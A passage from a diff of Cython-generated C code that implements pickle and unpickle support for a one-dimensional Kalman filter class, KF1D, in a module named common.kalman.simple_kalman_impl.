__pyx_t_1 = PyList_New(1); if (unlikely(!__pyx_t_1)) __PYX_ERR(2, 5, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_n_s_PickleError); + __Pyx_GIVEREF(__pyx_n_s_PickleError); + PyList_SET_ITEM(__pyx_t_1, 0, __pyx_n_s_PickleError); + __pyx_t_3 = __Pyx_Import(__pyx_n_s_pickle, __pyx_t_1, 0); if (unlikely(!__pyx_t_3)) __PYX_ERR(2, 5, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_ImportFrom(__pyx_t_3, __pyx_n_s_PickleError); if (unlikely(!__pyx_t_1)) __PYX_ERR(2, 5, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_t_1); + __pyx_v___pyx_PickleError = __pyx_t_1; + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + + /* "(tree fragment)":6 + * if __pyx_checksum not in (0xfddd3d9, 0xdbf7d68, 0x3439d7a): + * from pickle import PickleError as __pyx_PickleError + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0xfddd3d9, 0xdbf7d68, 0x3439d7a) = (A0_0, A0_1, A1_0, A1_1, A_K_0, A_K_1, A_K_2, A_K_3, C0_0, C0_1, K0_0, K1_0, x0_0, x1_0))" % __pyx_checksum # <<<<<<<<<<<<<< + * __pyx_result = KF1D.__new__(__pyx_type) + * if __pyx_state is not None: + */ + __pyx_t_3 = __Pyx_PyInt_From_long(__pyx_v___pyx_checksum); if (unlikely(!__pyx_t_3)) __PYX_ERR(2, 6, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_1 = __Pyx_PyString_Format(__pyx_kp_s_Incompatible_checksums_0x_x_vs_0, __pyx_t_3); if (unlikely(!__pyx_t_1)) __PYX_ERR(2, 6, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_Raise(__pyx_v___pyx_PickleError, __pyx_t_1, 0, 0); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __PYX_ERR(2, 6, __pyx_L1_error) + + /* "(tree fragment)":4 + * cdef object __pyx_PickleError + * cdef object __pyx_result + * if __pyx_checksum not in (0xfddd3d9, 0xdbf7d68, 0x3439d7a): # <<<<<<<<<<<<<< + * from pickle import PickleError as __pyx_PickleError + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0xfddd3d9, 0xdbf7d68, 0x3439d7a) = (A0_0, A0_1, A1_0, A1_1, A_K_0, A_K_1, A_K_2, A_K_3, C0_0, C0_1, K0_0, K1_0, x0_0, x1_0))" % __pyx_checksum + */ + } + + /* "(tree fragment)":7 + * from pickle import PickleError as __pyx_PickleError + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0xfddd3d9, 0xdbf7d68, 0x3439d7a) = (A0_0, A0_1, A1_0, A1_1, A_K_0, A_K_1, A_K_2, A_K_3, C0_0, C0_1, K0_0, K1_0, x0_0, x1_0))" % __pyx_checksum + * __pyx_result = KF1D.__new__(__pyx_type) # <<<<<<<<<<<<<< + * if __pyx_state is not None: + * __pyx_unpickle_KF1D__set_state( __pyx_result, __pyx_state) + */ + __pyx_t_3 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_ptype_6common_6kalman_18simple_kalman_impl_KF1D), __pyx_n_s_new); if (unlikely(!__pyx_t_3)) __PYX_ERR(2, 7, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_4 = NULL; + __pyx_t_5 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_3))) { + __pyx_t_4 = PyMethod_GET_SELF(__pyx_t_3); + if (likely(__pyx_t_4)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); + __Pyx_INCREF(__pyx_t_4); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_3, function); + __pyx_t_5 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_4, __pyx_v___pyx_type}; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_5, 1+__pyx_t_5); + __Pyx_XDECREF(__pyx_t_4); __pyx_t_4 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(2, 7, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + } + __pyx_v___pyx_result = __pyx_t_1; + __pyx_t_1 = 0; + + /* "(tree fragment)":8 + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0xfddd3d9, 0xdbf7d68, 0x3439d7a) = (A0_0, A0_1, A1_0, A1_1, A_K_0, A_K_1, A_K_2, A_K_3, C0_0, C0_1, K0_0, K1_0, x0_0, x1_0))" % __pyx_checksum + * __pyx_result = KF1D.__new__(__pyx_type) + * if __pyx_state is not None: # <<<<<<<<<<<<<< + * __pyx_unpickle_KF1D__set_state( __pyx_result, __pyx_state) + * return __pyx_result + */ + __pyx_t_2 = (__pyx_v___pyx_state != Py_None); + if (__pyx_t_2) { + + /* "(tree fragment)":9 + * __pyx_result = KF1D.__new__(__pyx_type) + * if __pyx_state is not None: + * __pyx_unpickle_KF1D__set_state( __pyx_result, __pyx_state) # <<<<<<<<<<<<<< + * return __pyx_result + * cdef __pyx_unpickle_KF1D__set_state(KF1D __pyx_result, tuple __pyx_state): + */ + if (!(likely(PyTuple_CheckExact(__pyx_v___pyx_state))||((__pyx_v___pyx_state) == Py_None) || __Pyx_RaiseUnexpectedTypeError("tuple", __pyx_v___pyx_state))) __PYX_ERR(2, 9, __pyx_L1_error) + __pyx_t_1 = __pyx_f_6common_6kalman_18simple_kalman_impl___pyx_unpickle_KF1D__set_state(((struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *)__pyx_v___pyx_result), ((PyObject*)__pyx_v___pyx_state)); if (unlikely(!__pyx_t_1)) __PYX_ERR(2, 9, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + + /* "(tree fragment)":8 + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0xfddd3d9, 0xdbf7d68, 0x3439d7a) = (A0_0, A0_1, A1_0, A1_1, A_K_0, A_K_1, A_K_2, A_K_3, C0_0, C0_1, K0_0, K1_0, x0_0, x1_0))" % __pyx_checksum + * __pyx_result = KF1D.__new__(__pyx_type) + * if __pyx_state is not None: # <<<<<<<<<<<<<< + * __pyx_unpickle_KF1D__set_state( __pyx_result, __pyx_state) + * return __pyx_result + */ + } + + /* "(tree fragment)":10 + * if __pyx_state is not None: + * __pyx_unpickle_KF1D__set_state( __pyx_result, __pyx_state) + * return __pyx_result # <<<<<<<<<<<<<< + * cdef __pyx_unpickle_KF1D__set_state(KF1D __pyx_result, tuple __pyx_state): + * __pyx_result.A0_0 = __pyx_state[0]; __pyx_result.A0_1 = __pyx_state[1]; __pyx_result.A1_0 = __pyx_state[2]; __pyx_result.A1_1 = __pyx_state[3]; __pyx_result.A_K_0 = __pyx_state[4]; __pyx_result.A_K_1 = __pyx_state[5]; __pyx_result.A_K_2 = __pyx_state[6]; __pyx_result.A_K_3 = __pyx_state[7]; __pyx_result.C0_0 = __pyx_state[8]; __pyx_result.C0_1 = __pyx_state[9]; __pyx_result.K0_0 = __pyx_state[10]; __pyx_result.K1_0 = __pyx_state[11]; __pyx_result.x0_0 = __pyx_state[12]; __pyx_result.x1_0 = __pyx_state[13] + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_v___pyx_result); + __pyx_r = __pyx_v___pyx_result; + goto __pyx_L0; + + /* "(tree fragment)":1 + * def __pyx_unpickle_KF1D(__pyx_type, long __pyx_checksum, __pyx_state): # <<<<<<<<<<<<<< + * cdef object __pyx_PickleError + * cdef object __pyx_result + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_AddTraceback("common.kalman.simple_kalman_impl.__pyx_unpickle_KF1D", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v___pyx_PickleError); + __Pyx_XDECREF(__pyx_v___pyx_result); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":11 + * __pyx_unpickle_KF1D__set_state( __pyx_result, __pyx_state) + * return __pyx_result + * cdef __pyx_unpickle_KF1D__set_state(KF1D __pyx_result, tuple __pyx_state): # <<<<<<<<<<<<<< + * __pyx_result.A0_0 = __pyx_state[0]; __pyx_result.A0_1 = __pyx_state[1]; __pyx_result.A1_0 = __pyx_state[2]; __pyx_result.A1_1 = __pyx_state[3]; __pyx_result.A_K_0 = __pyx_state[4]; __pyx_result.A_K_1 = __pyx_state[5]; __pyx_result.A_K_2 = __pyx_state[6]; __pyx_result.A_K_3 = __pyx_state[7]; __pyx_result.C0_0 = __pyx_state[8]; __pyx_result.C0_1 = __pyx_state[9]; __pyx_result.K0_0 = __pyx_state[10]; __pyx_result.K1_0 = __pyx_state[11]; __pyx_result.x0_0 = __pyx_state[12]; __pyx_result.x1_0 = __pyx_state[13] + * if len(__pyx_state) > 14 and hasattr(__pyx_result, '__dict__'): + */ + +static PyObject *__pyx_f_6common_6kalman_18simple_kalman_impl___pyx_unpickle_KF1D__set_state(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v___pyx_result, PyObject *__pyx_v___pyx_state) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + double __pyx_t_2; + int __pyx_t_3; + Py_ssize_t __pyx_t_4; + int __pyx_t_5; + PyObject *__pyx_t_6 = NULL; + PyObject *__pyx_t_7 = NULL; + PyObject *__pyx_t_8 = NULL; + int __pyx_t_9; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__pyx_unpickle_KF1D__set_state", 0); + + /* "(tree fragment)":12 + * return __pyx_result + * cdef __pyx_unpickle_KF1D__set_state(KF1D __pyx_result, tuple __pyx_state): + * __pyx_result.A0_0 = __pyx_state[0]; __pyx_result.A0_1 = __pyx_state[1]; __pyx_result.A1_0 = __pyx_state[2]; __pyx_result.A1_1 = __pyx_state[3]; __pyx_result.A_K_0 = __pyx_state[4]; __pyx_result.A_K_1 = __pyx_state[5]; __pyx_result.A_K_2 = __pyx_state[6]; __pyx_result.A_K_3 = __pyx_state[7]; __pyx_result.C0_0 = __pyx_state[8]; __pyx_result.C0_1 = __pyx_state[9]; __pyx_result.K0_0 = __pyx_state[10]; __pyx_result.K1_0 = __pyx_state[11]; __pyx_result.x0_0 = __pyx_state[12]; __pyx_result.x1_0 = __pyx_state[13] # <<<<<<<<<<<<<< + * if len(__pyx_state) > 14 and hasattr(__pyx_result, '__dict__'): + * __pyx_result.__dict__.update(__pyx_state[14]) + */ + if (unlikely(__pyx_v___pyx_state == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(2, 12, __pyx_L1_error) + } + __pyx_t_1 = __Pyx_GetItemInt_Tuple(__pyx_v___pyx_state, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(2, 12, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __pyx_PyFloat_AsDouble(__pyx_t_1); if (unlikely((__pyx_t_2 == (double)-1) && PyErr_Occurred())) __PYX_ERR(2, 12, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_v___pyx_result->A0_0 = __pyx_t_2; + if (unlikely(__pyx_v___pyx_state == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(2, 12, __pyx_L1_error) + } + __pyx_t_1 = __Pyx_GetItemInt_Tuple(__pyx_v___pyx_state, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(2, 12, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __pyx_PyFloat_AsDouble(__pyx_t_1); if (unlikely((__pyx_t_2 == (double)-1) && PyErr_Occurred())) __PYX_ERR(2, 12, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_v___pyx_result->A0_1 = __pyx_t_2; + if (unlikely(__pyx_v___pyx_state == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(2, 12, __pyx_L1_error) + } + __pyx_t_1 = __Pyx_GetItemInt_Tuple(__pyx_v___pyx_state, 2, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(2, 12, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __pyx_PyFloat_AsDouble(__pyx_t_1); if (unlikely((__pyx_t_2 == (double)-1) && PyErr_Occurred())) __PYX_ERR(2, 12, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_v___pyx_result->A1_0 = __pyx_t_2; + if (unlikely(__pyx_v___pyx_state == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(2, 12, __pyx_L1_error) + } + __pyx_t_1 = __Pyx_GetItemInt_Tuple(__pyx_v___pyx_state, 3, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(2, 12, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __pyx_PyFloat_AsDouble(__pyx_t_1); if (unlikely((__pyx_t_2 == (double)-1) && PyErr_Occurred())) __PYX_ERR(2, 12, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_v___pyx_result->A1_1 = __pyx_t_2; + if (unlikely(__pyx_v___pyx_state == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(2, 12, __pyx_L1_error) + } + __pyx_t_1 = __Pyx_GetItemInt_Tuple(__pyx_v___pyx_state, 4, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(2, 12, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __pyx_PyFloat_AsDouble(__pyx_t_1); if (unlikely((__pyx_t_2 == (double)-1) && PyErr_Occurred())) __PYX_ERR(2, 12, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_v___pyx_result->A_K_0 = __pyx_t_2; + if (unlikely(__pyx_v___pyx_state == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(2, 12, __pyx_L1_error) + } + __pyx_t_1 = __Pyx_GetItemInt_Tuple(__pyx_v___pyx_state, 5, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(2, 12, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __pyx_PyFloat_AsDouble(__pyx_t_1); if (unlikely((__pyx_t_2 == (double)-1) && PyErr_Occurred())) __PYX_ERR(2, 12, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_v___pyx_result->A_K_1 = __pyx_t_2; + if (unlikely(__pyx_v___pyx_state == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(2, 12, __pyx_L1_error) + } + __pyx_t_1 = __Pyx_GetItemInt_Tuple(__pyx_v___pyx_state, 6, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(2, 12, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __pyx_PyFloat_AsDouble(__pyx_t_1); if (unlikely((__pyx_t_2 == (double)-1) && PyErr_Occurred())) __PYX_ERR(2, 12, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_v___pyx_result->A_K_2 = __pyx_t_2; + if (unlikely(__pyx_v___pyx_state == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(2, 12, __pyx_L1_error) + } + __pyx_t_1 = __Pyx_GetItemInt_Tuple(__pyx_v___pyx_state, 7, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(2, 12, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __pyx_PyFloat_AsDouble(__pyx_t_1); if (unlikely((__pyx_t_2 == (double)-1) && PyErr_Occurred())) __PYX_ERR(2, 12, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_v___pyx_result->A_K_3 = __pyx_t_2; + if (unlikely(__pyx_v___pyx_state == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(2, 12, __pyx_L1_error) + } + __pyx_t_1 = __Pyx_GetItemInt_Tuple(__pyx_v___pyx_state, 8, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(2, 12, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __pyx_PyFloat_AsDouble(__pyx_t_1); if (unlikely((__pyx_t_2 == (double)-1) && PyErr_Occurred())) __PYX_ERR(2, 12, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_v___pyx_result->C0_0 = __pyx_t_2; + if (unlikely(__pyx_v___pyx_state == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(2, 12, __pyx_L1_error) + } + __pyx_t_1 = __Pyx_GetItemInt_Tuple(__pyx_v___pyx_state, 9, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(2, 12, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __pyx_PyFloat_AsDouble(__pyx_t_1); if (unlikely((__pyx_t_2 == (double)-1) && PyErr_Occurred())) __PYX_ERR(2, 12, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_v___pyx_result->C0_1 = __pyx_t_2; + if (unlikely(__pyx_v___pyx_state == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(2, 12, __pyx_L1_error) + } + __pyx_t_1 = __Pyx_GetItemInt_Tuple(__pyx_v___pyx_state, 10, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(2, 12, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __pyx_PyFloat_AsDouble(__pyx_t_1); if (unlikely((__pyx_t_2 == (double)-1) && PyErr_Occurred())) __PYX_ERR(2, 12, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_v___pyx_result->K0_0 = __pyx_t_2; + if (unlikely(__pyx_v___pyx_state == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(2, 12, __pyx_L1_error) + } + __pyx_t_1 = __Pyx_GetItemInt_Tuple(__pyx_v___pyx_state, 11, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(2, 12, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __pyx_PyFloat_AsDouble(__pyx_t_1); if (unlikely((__pyx_t_2 == (double)-1) && PyErr_Occurred())) __PYX_ERR(2, 12, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_v___pyx_result->K1_0 = __pyx_t_2; + if (unlikely(__pyx_v___pyx_state == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(2, 12, __pyx_L1_error) + } + __pyx_t_1 = __Pyx_GetItemInt_Tuple(__pyx_v___pyx_state, 12, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(2, 12, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __pyx_PyFloat_AsDouble(__pyx_t_1); if (unlikely((__pyx_t_2 == (double)-1) && PyErr_Occurred())) __PYX_ERR(2, 12, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_v___pyx_result->x0_0 = __pyx_t_2; + if (unlikely(__pyx_v___pyx_state == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(2, 12, __pyx_L1_error) + } + __pyx_t_1 = __Pyx_GetItemInt_Tuple(__pyx_v___pyx_state, 13, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(2, 12, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __pyx_PyFloat_AsDouble(__pyx_t_1); if (unlikely((__pyx_t_2 == (double)-1) && PyErr_Occurred())) __PYX_ERR(2, 12, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_v___pyx_result->x1_0 = __pyx_t_2; + + /* "(tree fragment)":13 + * cdef __pyx_unpickle_KF1D__set_state(KF1D __pyx_result, tuple __pyx_state): + * __pyx_result.A0_0 = __pyx_state[0]; __pyx_result.A0_1 = __pyx_state[1]; __pyx_result.A1_0 = __pyx_state[2]; __pyx_result.A1_1 = __pyx_state[3]; __pyx_result.A_K_0 = __pyx_state[4]; __pyx_result.A_K_1 = __pyx_state[5]; __pyx_result.A_K_2 = __pyx_state[6]; __pyx_result.A_K_3 = __pyx_state[7]; __pyx_result.C0_0 = __pyx_state[8]; __pyx_result.C0_1 = __pyx_state[9]; __pyx_result.K0_0 = __pyx_state[10]; __pyx_result.K1_0 = __pyx_state[11]; __pyx_result.x0_0 = __pyx_state[12]; __pyx_result.x1_0 = __pyx_state[13] + * if len(__pyx_state) > 14 and hasattr(__pyx_result, '__dict__'): # <<<<<<<<<<<<<< + * __pyx_result.__dict__.update(__pyx_state[14]) + */ + if (unlikely(__pyx_v___pyx_state == Py_None)) { + PyErr_SetString(PyExc_TypeError, "object of type 'NoneType' has no len()"); + __PYX_ERR(2, 13, __pyx_L1_error) + } + __pyx_t_4 = PyTuple_GET_SIZE(__pyx_v___pyx_state); if (unlikely(__pyx_t_4 == ((Py_ssize_t)-1))) __PYX_ERR(2, 13, __pyx_L1_error) + __pyx_t_5 = (__pyx_t_4 > 14); + if (__pyx_t_5) { + } else { + __pyx_t_3 = __pyx_t_5; + goto __pyx_L4_bool_binop_done; + } + __pyx_t_5 = __Pyx_HasAttr(((PyObject *)__pyx_v___pyx_result), __pyx_n_s_dict); if (unlikely(__pyx_t_5 == ((int)-1))) __PYX_ERR(2, 13, __pyx_L1_error) + __pyx_t_3 = __pyx_t_5; + __pyx_L4_bool_binop_done:; + if (__pyx_t_3) { + + /* "(tree fragment)":14 + * __pyx_result.A0_0 = __pyx_state[0]; __pyx_result.A0_1 = __pyx_state[1]; __pyx_result.A1_0 = __pyx_state[2]; __pyx_result.A1_1 = __pyx_state[3]; __pyx_result.A_K_0 = __pyx_state[4]; __pyx_result.A_K_1 = __pyx_state[5]; __pyx_result.A_K_2 = __pyx_state[6]; __pyx_result.A_K_3 = __pyx_state[7]; __pyx_result.C0_0 = __pyx_state[8]; __pyx_result.C0_1 = __pyx_state[9]; __pyx_result.K0_0 = __pyx_state[10]; __pyx_result.K1_0 = __pyx_state[11]; __pyx_result.x0_0 = __pyx_state[12]; __pyx_result.x1_0 = __pyx_state[13] + * if len(__pyx_state) > 14 and hasattr(__pyx_result, '__dict__'): + * __pyx_result.__dict__.update(__pyx_state[14]) # <<<<<<<<<<<<<< + */ + __pyx_t_6 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v___pyx_result), __pyx_n_s_dict); if (unlikely(!__pyx_t_6)) __PYX_ERR(2, 14, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __pyx_t_7 = __Pyx_PyObject_GetAttrStr(__pyx_t_6, __pyx_n_s_update); if (unlikely(!__pyx_t_7)) __PYX_ERR(2, 14, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + if (unlikely(__pyx_v___pyx_state == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(2, 14, __pyx_L1_error) + } + __pyx_t_6 = __Pyx_GetItemInt_Tuple(__pyx_v___pyx_state, 14, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_6)) __PYX_ERR(2, 14, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __pyx_t_8 = NULL; + __pyx_t_9 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_7))) { + __pyx_t_8 = PyMethod_GET_SELF(__pyx_t_7); + if (likely(__pyx_t_8)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_7); + __Pyx_INCREF(__pyx_t_8); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_7, function); + __pyx_t_9 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_8, __pyx_t_6}; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_7, __pyx_callargs+1-__pyx_t_9, 1+__pyx_t_9); + __Pyx_XDECREF(__pyx_t_8); __pyx_t_8 = 0; + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(2, 14, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + } + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + + /* "(tree fragment)":13 + * cdef __pyx_unpickle_KF1D__set_state(KF1D __pyx_result, tuple __pyx_state): + * __pyx_result.A0_0 = __pyx_state[0]; __pyx_result.A0_1 = __pyx_state[1]; __pyx_result.A1_0 = __pyx_state[2]; __pyx_result.A1_1 = __pyx_state[3]; __pyx_result.A_K_0 = __pyx_state[4]; __pyx_result.A_K_1 = __pyx_state[5]; __pyx_result.A_K_2 = __pyx_state[6]; __pyx_result.A_K_3 = __pyx_state[7]; __pyx_result.C0_0 = __pyx_state[8]; __pyx_result.C0_1 = __pyx_state[9]; __pyx_result.K0_0 = __pyx_state[10]; __pyx_result.K1_0 = __pyx_state[11]; __pyx_result.x0_0 = __pyx_state[12]; __pyx_result.x1_0 = __pyx_state[13] + * if len(__pyx_state) > 14 and hasattr(__pyx_result, '__dict__'): # <<<<<<<<<<<<<< + * __pyx_result.__dict__.update(__pyx_state[14]) + */ + } + + /* "(tree fragment)":11 + * __pyx_unpickle_KF1D__set_state( __pyx_result, __pyx_state) + * return __pyx_result + * cdef __pyx_unpickle_KF1D__set_state(KF1D __pyx_result, tuple __pyx_state): # <<<<<<<<<<<<<< + * __pyx_result.A0_0 = __pyx_state[0]; __pyx_result.A0_1 = __pyx_state[1]; __pyx_result.A1_0 = __pyx_state[2]; __pyx_result.A1_1 = __pyx_state[3]; __pyx_result.A_K_0 = __pyx_state[4]; __pyx_result.A_K_1 = __pyx_state[5]; __pyx_result.A_K_2 = __pyx_state[6]; __pyx_result.A_K_3 = __pyx_state[7]; __pyx_result.C0_0 = __pyx_state[8]; __pyx_result.C0_1 = __pyx_state[9]; __pyx_result.K0_0 = __pyx_state[10]; __pyx_result.K1_0 = __pyx_state[11]; __pyx_result.x0_0 = __pyx_state[12]; __pyx_result.x1_0 = __pyx_state[13] + * if len(__pyx_state) > 14 and hasattr(__pyx_result, '__dict__'): + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_XDECREF(__pyx_t_7); + __Pyx_XDECREF(__pyx_t_8); + __Pyx_AddTraceback("common.kalman.simple_kalman_impl.__pyx_unpickle_KF1D__set_state", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_tp_new_6common_6kalman_18simple_kalman_impl_KF1D(PyTypeObject *t, CYTHON_UNUSED PyObject *a, CYTHON_UNUSED PyObject *k) { + PyObject *o; + #if CYTHON_COMPILING_IN_LIMITED_API + allocfunc alloc_func = (allocfunc)PyType_GetSlot(t, Py_tp_alloc); + o = alloc_func(t, 0); + #else + if 